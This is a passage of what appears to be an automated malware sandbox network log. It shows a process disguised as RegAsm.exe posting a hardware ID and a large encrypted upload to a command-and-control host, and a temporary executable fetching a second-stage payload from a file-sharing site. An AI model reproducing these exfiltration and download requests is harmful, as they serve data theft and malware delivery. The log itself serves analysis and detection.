2023-12-27 17:12:55 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0hfnv45194u270li27pea1hbog; expires=Sun, 21-Apr-2024 10:59:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLD8lk5OKm59MH4l26d2Sm2HEu%2F8ify%2BmHO3gwdq76ji1X34zTfOIJRBAgVXqTVLvtTOssyKCGUanqIUJlPjp%2FusEnMzG0THNhp29%2FVjUgr0InznxPz%2BuFqRrHKlvrgD%2Fks86cW9IR8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330edcbf66bb0-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 17:12:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49772	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:56 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 430962 Host: chincenterblandwka.pw
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: be 19 b1 84 3a a4 dc ed b9 50 f8 f0 a7 d8 37 8b 13 2a bc 49 8d 18 6a 85 99 ac fa 20 2c d3 5d 88 e4 54 bc a9 c2 22 4c fe 79 cc 1c 25 69 ab ce c7 49 9e 53 63 2f cc 25 ad c8 57 74 ff 93 7a 86 7e 48 88 4c a2 b5 a2 a8 fc 1b 52 2b 9d 7e b0 de 8e dc ff 82 0c b0 b0 d7 2f 68 6d ab 53 58 b1 45 f9 53 9f 50 16 d2 40 46 58 e3 0d 37 b6 3d 14 0b 86 ec 4f d4 94 a9 5c 6b 34 4e a3 52 dc d0 6f 76 a8 43 f5 7d 6f 87 9b d2 77 cb e5 ad c3 1a 93 48 6a 55 45 db c8 ee 85 78 6d 1e 48 9e b4 76 f4 46 7c 98 2e 5b 79 79 34 20 71 ef 65 6e 7c 9b 43 b5 61 33 78 85 8e 13 32 46 7c 22 f4 f2 d8 b5 82 6d 15 14 b5 18 2c ad 33 6c 8c a4 68 c9 b5 81 ba fc a4 0f 20 8e 5e 3b ab ae 16 31 f3 af 09 55 8f e8 8d 43 70 c5 0d cf 4d c2 8c f5 9c b1 3b 3e 4e 22 d1 53 01 a0 b2 5e 0c 84 ec 26 eb 58 ee 39 d9 f2 Data Ascii: :P7*Ij ,]T"Ly%iISc/%Wtz~HLR+~/hmSXESP@FX7=O\k4NRovC}owHjUExmHvF\|.[yy4 qen\|Ca3x2F\|"m,3lh ^;1UCpM;>N"S^&X9
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: 66 5e c1 96 01 d3 31 0f 2a 7a 6d a9 7a 50 a7 c8 4d 7e 6a 75 80 f0 82 f5 a2 f1 84 22 bf 91 0e bf fa 1e b3 90 a9 56 27 6e bc 08 2d 79 87 80 89 ad 32 b7 dd e2 6e 05 41 7d d8 bc 35 43 e4 6a 33 08 05 bc da 5f 1f d4 c3 03 dc b1 7d 04 f5 96 12 7c 9e 7d 29 f0 c8 be 43 69 de 4c 9b b1 7c 1e cc c7 ef 96 96 d3 8c f9 6c 68 9b 4f 3a f6 3c 68 73 30 78 e9 f6 37 a3 c9 81 f6 75 46 b1 e5 fe 8e 73 2c 49 74 30 91 b7 af 96 f1 98 af dd b3 4e 91 a6 30 48 bf 7f 3f 45 6f b3 43 29 63 f3 97 00 02 d6 4a 71 85 dc 34 80 c9 9f cc 29 e2 dd ab 45 3e 53 81 5c a8 88 83 37 2f af 23 04 76 1f e8 ca 5f 22 68 0c 7f ad f0 75 4e d8 aa 2b ce 83 4b a4 98 ed 3b 49 28 7d 94 a1 99 9f ea b1 f3 d6 92 65 e6 be 11 13 e2 a4 03 ac d1 ee e3 ec 7a 9d 5c 89 20 56 72 75 e9 87 92 40 8c a7 06 a2 a6 e0 5f 02 c6 d1 Data Ascii: f^1*zmzPM~ju"V'n-y2nA}5Cj3_}\|})CiL\|lhO:<hs0x7uFs,It0N0H?EoC)cJq4)E>S\7/#v_"huN+K;I(}ez\ Vru@_
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: b8 c5 c7 1b 7a 28 41 40 d0 6c b7 11 5b 06 69 b2 67 a9 bd 93 d0 0a 0a b2 d8 a6 bb e4 87 d5 b7 d1 cc ec 92 99 e7 50 d8 ef 56 fb 04 fd 16 7c 35 1c 44 91 af d9 de 7f ca f9 bb dd 7e ff b5 c7 fa a8 46 95 e7 51 d2 89 69 06 4e 30 c8 09 d8 27 58 60 e8 a9 2c d4 a9 18 bd 75 5c 5b ac c4 ad af 57 19 11 1a 24 f0 d0 b6 71 6f ee 25 cd 86 64 e5 99 27 72 8f 76 83 53 5d d9 76 b5 01 8f 2e 26 fa bc 34 3b b0 20 0d 7a 1f 7a 9a 20 66 fa 6d 45 c0 df 9d 1f db e4 73 89 c8 e9 c6 cc 28 e8 1b 34 61 a7 4d 52 22 ca 9c 2e 14 f0 8d 26 ac 6c e3 e3 ad ba 7a 62 ad 15 3f 6a 36 bc f8 ee 28 82 d7 61 9c 2c cf bb 6a 2b 22 e9 8a a2 00 f1 19 d5 fb 95 e3 8c 1b a3 3a 66 e5 c9 32 a0 90 59 bd 98 31 05 89 e7 22 75 f0 3c 08 e1 74 6d 92 50 7e b1 6d 70 72 5e b8 f4 fb 87 dd 25 3d ea 02 94 f8 b6 3d 70 1a a3 Data Ascii: z(A@l[igPV\|5D~FQiN0'X`,u\[W$qo%d'rvS]v.&4; zz fmEs(4aMR".&lzb?j6(a,j+":f2Y1"u<tmP~mpr^%==p
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: 2e 2d fc ac ec f6 0f db 5f 3a e8 68 0c cf e2 5b c5 e2 9a ae 5a 32 1a 6f 79 ea 4a fd f4 1e 2e 53 8c 4e fa 20 75 f7 e0 e3 23 ec 22 7f d8 99 d0 5c 0b 84 8f 30 28 80 df 30 52 05 bd 52 e9 c7 8c dd 85 ed 0e 01 c8 eb 80 b8 c8 77 5a ed 10 1a d0 c5 b7 4a 13 93 09 57 24 1f 7a c3 00 2a de 9c 48 ac c8 f5 cb 45 c7 94 c8 e1 02 14 a7 b9 02 7b 3b 51 b3 72 3e fd 87 7d c4 3b 40 fc cb 15 7f f9 83 aa 83 a8 bd bb 03 7b 86 84 3e 21 a7 72 4e 5e c3 3d 22 0e b2 58 2f 4a 3a b4 6e 34 1b c7 54 7f 38 81 11 41 07 e3 16 4a 04 1e d1 1c 35 69 4e 05 5f 62 a1 14 80 e0 9c 6d a4 69 0c 44 3d 12 cb 37 64 b8 e8 28 e0 21 54 55 24 c4 eb 16 86 04 ef 62 2a 48 2f b4 21 fb 9f 8b d2 2a 78 a6 12 c7 3c 2b fc dc bf 36 65 f4 cc 24 23 e7 5f 8d 1c 13 44 1f 3b 79 e3 5c 7a 42 20 c5 0a 8f af 2a 84 a2 95 98 94 Data Ascii: .-_:h[Z2oyJ.SN u#"\0(0RRwZJW$zHE{;Qr>};@{>!rN^="X/J:n4T8AJ5iN_bmiD=7d(!TU$bH/!x<+6e$#_D;y\zB
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: d2 68 68 51 35 d4 28 a1 c6 b0 9d 69 f4 d3 c3 9f ea ea 2c 7e 16 90 87 3f 2a 0d 8b f2 fc 57 92 db 6a 50 43 46 51 60 83 df 19 22 f8 87 2f 4e e4 d6 07 5c e4 20 a2 94 17 fc 12 6d 64 86 d6 c4 36 cf 98 7c 92 83 12 6b 74 5b d9 67 e9 19 84 98 25 b4 32 eb 6c 57 6a d9 d6 15 d7 1a ef 98 62 bc c6 63 be 0c e2 2b 7a 3c e4 28 1b 54 7e e1 84 44 7f 80 30 ee ad 5f ec d2 56 4d 14 e5 c5 f7 0c 8f 2d fc fc f8 86 22 1d 3d 1f e2 d9 52 c6 1e 67 14 60 77 1e d3 40 cd 04 78 c9 3b 0d e1 d2 e9 84 bf 5b 69 d3 c6 76 d4 6c 4a 1d ca d8 55 b8 f8 d1 d0 78 36 1d df 7d 56 7c 1b 21 2e 74 ef ce 26 3c 5c da f0 ef 60 06 54 39 26 ac 37 5c 11 2a 01 0b 92 3c 60 c1 14 f1 b0 1e 3c 8b 1c 2f 12 7b e0 e8 1e 91 a2 b1 96 a6 8b 5e 1e e1 a3 1c 0f 72 d7 c7 31 b7 a6 73 26 70 c0 bd a5 4a 80 07 ac 59 f1 01 a3 03 Data Ascii: hhQ5(i,~?WjPCFQ`"/N\ md6\|kt[g%2lWjbc+z<(T~D0_VM-"=Rg`w@x;[ivlJUx6}V\|!.t&<\`T9&7\<`</{^r1s&pJY
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: 83 33 d7 6c 60 4b 74 e3 92 7a 7f b3 57 84 cf 15 31 52 2a b5 c5 b0 c4 72 d9 12 4a 0d 0b ec 25 65 2f 50 4b 50 2b 95 ae c2 ab 79 f3 66 b4 17 21 61 dd 82 dd b8 f6 7b c1 fc ad 6b f6 cd 71 df 6d 92 36 1d a0 54 af a5 1b bc 6a 83 e9 c3 06 fd 38 bd a8 81 98 67 b0 e3 8b 08 da 56 ca c0 33 74 a0 dc c6 b5 68 7a 80 2e 80 b6 56 4b c9 e5 de ef ab 36 73 b7 bc 7a 01 7d c3 ab aa 05 a2 73 14 e9 6c 14 3d 7e 73 ee bd 12 ca 3f e0 e3 7a a5 d9 ee dc 0f 1b e7 f6 01 7f 9f 9f eb 88 21 9b 26 05 74 e2 2f 7c be 36 96 8d 83 61 7f 42 6b ca dd c9 77 32 60 e7 da c8 a3 9a ca 1e 0c c8 5d ff e7 70 c7 ab c0 32 bb 2c 9f d2 2f 40 bc 93 60 57 e1 5a 9b f0 46 ed 64 5a e7 17 0d 3e 60 ba d2 f6 5e 11 ec 25 a9 39 be db 1c 4c bd e6 57 2e d5 f4 5d 21 4a 73 88 0d 61 9c 3c 2d 83 52 69 6d 35 7c 5c 2a 77 74 Data Ascii: 3l`KtzW1RrJ%e/PKP+yf!a{kqm6Tj8gV3thz.VK6sz}sl=~s?z!&t/\|6aBkw2`]p2,/@`WZFdZ>`^%9LW.]!Jsa<-Rim5\|\wt
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: f3 9b 0d 1c 01 27 44 32 65 ac b6 27 6b fd 33 3f 7d d1 73 cb 04 27 9c 7e 01 9c 44 0f cd dd dd b3 3c d4 35 20 57 6a 5a f2 69 70 b4 a6 82 17 e9 3f c4 e7 1d d8 c5 60 4d 74 4a 55 ed 4d 56 dc 0f 78 23 89 50 e1 38 5e 97 f7 b3 4b d3 60 af 80 af 22 bb 3c 11 35 b4 27 b8 7a 7b 64 24 e5 42 b7 6a 64 44 c5 42 58 19 43 40 8f eb 67 5c 64 b8 a8 f4 c6 4e 6c 3e af 69 56 db 4b e9 89 1b 63 2b 0e 85 76 bd 53 ac 59 c3 af 3b b2 d0 3b 01 6f 72 f8 0b de 9a e3 db aa aa ba 9f 9c 54 37 af 16 69 d5 3d bf 8b ec 49 4a 8c 5f f4 02 f4 02 61 f1 6e e4 cc 2e 4c 0c 27 f0 b8 15 ee c9 28 8a 2a be 8c 33 33 3e 6f cc 97 e0 0d a3 96 f1 ea e0 99 aa e1 e1 b8 e0 52 3e bd 2c 11 5f f4 a6 26 8d c3 a7 bc c8 e9 7f f2 bd 42 ad 3e 92 97 d7 1f bc f8 93 f1 85 f6 d7 9e f0 46 3d 16 fb 9b 60 33 30 ec 1d 79 76 8d Data Ascii: 'D2e'k3?}s'~D<5 WjZip?`MtJUMVx#P8^K`"<5'z{d$BjdDBXC@g\dNl>iVKc+vSY;;orT7i=IJ_an.L'(*33>oR>,_&B>F=`30yv
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: 78 6d f4 47 0d 7a b5 ae ec 06 74 d2 9c a0 2f b8 9e 97 da e6 2e 4b 76 dc 9b 1b c6 d3 24 c0 c1 14 6f 54 d1 25 32 86 aa 09 da 14 0a 8b f9 6f d1 f0 29 a9 84 57 aa af b7 95 0e 48 10 2c cc 32 a6 52 ef f1 64 14 a7 dd 02 25 ae 67 d9 b4 ed 0b 09 ab 9f 93 a7 ab 4e 40 52 e1 af fd f0 e7 60 3f af 0f d2 f4 91 a7 74 8b 10 ab a6 c5 cc e8 7c f3 ed 82 13 cd 82 fa db 5d 40 47 7b a5 29 8b 46 9b 8b f3 56 f2 4b 7c 4a 8e 09 ab a0 f9 fc 4d 68 f9 6f be 22 a2 63 93 71 77 89 81 5c 9f 71 1d 53 ae d6 dc 89 0e 2b 95 aa 0d b5 99 32 1a 8c 7e 91 b2 1c a9 7f 50 8a 2e 2a 12 fe e7 84 2d 7e a4 ad ed 89 db 4d 5d de ff db 9f bf 5f 28 e0 a7 2a 1a 45 41 10 8c 7f 07 0e 02 dd af 54 ff 32 29 d1 c7 7b d5 ee c6 c0 df dd 2f b9 ba fa a5 af d2 38 45 ca bc 8e 2e cc 6e be 7b a2 0e 84 f6 c1 6b fb 95 4b db Data Ascii: xmGzt/.Kv$oT%2o)WH,2Rd%gN@R`?t\|]@G{)FVK\|JMho"cqw\qS+2~P.-~M]_(EAT2){/8E.n{kK
2023-12-27 17:12:56 UTC	15331	OUT	Data Raw: 7f 04 1f c4 8c bd aa 76 7f d5 39 34 6f f0 3d ec 93 fc dc d6 e5 40 d6 f3 e6 9d 83 4e 21 35 62 9c 55 d3 af 90 7e 0f 05 a4 ef 1e bc 84 8e ac 89 31 f6 02 1d 8d f7 ee 11 06 5d 56 52 89 78 42 11 61 f2 23 d3 6a c2 d9 8d f9 31 24 cb 13 6e 88 b8 cf c6 ee 34 63 2c b7 5b 55 58 33 ab 43 3a 2f 6c ee 34 c5 11 4d f6 6d 7e b0 95 18 8b 5c e0 a3 cc 20 9f 73 bd aa 74 53 f0 5a 80 e8 a3 0e 16 15 85 72 e5 8a 8d 8f 29 cd de 73 be 60 34 21 4c 73 57 fa 24 bc 97 b4 4b 22 c8 a3 36 7c 25 92 29 95 60 f3 5a e2 6d 2b 57 6f 58 f3 d8 41 32 42 bf 6a ab a0 a9 c8 a7 45 8f 19 c7 4f 68 67 b8 ec 52 1d bb 63 b8 10 5e 23 d0 a5 d2 ce 94 a3 bf 23 74 8d e8 f8 94 c5 86 c3 81 0f 91 f3 ca a5 8c 17 b2 b4 34 be 38 f7 0c bc 69 2a f1 07 34 dd 33 db ac a9 22 47 43 45 f6 59 43 30 b2 47 71 d0 58 70 23 9c 22 Data Ascii: v94o=@N!5bU~1]VRxBa#j1$n4c,[UX3C:/l4Mm~\ stSZr)s`4!LsW$K"6\|%)`Zm+WoXA2BjEOhgRc^##t48i*43"GCEYC0GqXp#"
2023-12-27 17:13:00 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dhk4t88tanbv2drkk39okvmdv9; expires=Sun, 21-Apr-2024 10:59:38 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:59 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:59 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:59 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iW05LiBzNokD%2Bb40QJVkHWcQR7ZK41TcShWq48qxzUOjXhnMNsiXeC%2B%2BUpTnpZI10nff2dq0ifK%2FAEX1t0XiSI5hAILbRBxBjq6%2B8C%2FpvrhltBrU5Ekxu4DQefZqdRjfkIzuYZNbDG0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330f83ca26b2b-DFW alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49781	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:13:01 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 640 Host: chincenterblandwka.pw
2023-12-27 17:13:01 UTC	640	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:13:02 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ia17a1gokrdagief17k2visb1n; expires=Sun, 21-Apr-2024 10:59:40 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZZWoroetguthQ1wpjZS40h7LrDH0K4JFUunM2Y%2F3LiqMEAmyXJ4f9uRMHGZJuJULer954BGKyBUEVLh%2FWUSmKt83J44vLE8PftLGpxyCdTwaEJOarbWFibAjj5gFBXOaoJU0v3QdZl0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33119b89b2cd8-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:13:02 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 17:13:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49784	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:13:03 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 643 Host: chincenterblandwka.pw
2023-12-27 17:13:03 UTC	643	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:13:04 UTC	1327	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1l562g34pmf0s923c4bo9o3skl; expires=Sun, 21-Apr-2024 10:59:43 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tF6G0ZkF0Vbu369Cf8PGllAMQP3Efb4gvqRNUqMyaH1h5AjWmS90RKzeCzDaf9vI%2Bn%2BnBDiBb2m6MalK8Lr8pFxbRmA6bPo2FyZlXuIkhOtm7v4hJcwv01r8xqIzLeSFPuew%2BzxT1XY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331279a020bca-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:13:04 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 17:13:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49844	194.15.112.248	443	2564	C:\Users\user\AppData\Local\Temp\F38F.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:13:58 UTC	75	OUT	GET /TukN/PL1226two.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-12-27 17:13:59 UTC	158	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 27 Dec 2023 17:13:59 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-12-27 17:13:59 UTC	1849	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Target ID:	0
Start time:	18:11:51
Start date:	27/12/2023
Path:	C:\Users\user\Desktop\uVQLD8YVk6.exe
Wow64 process (32bit):	true
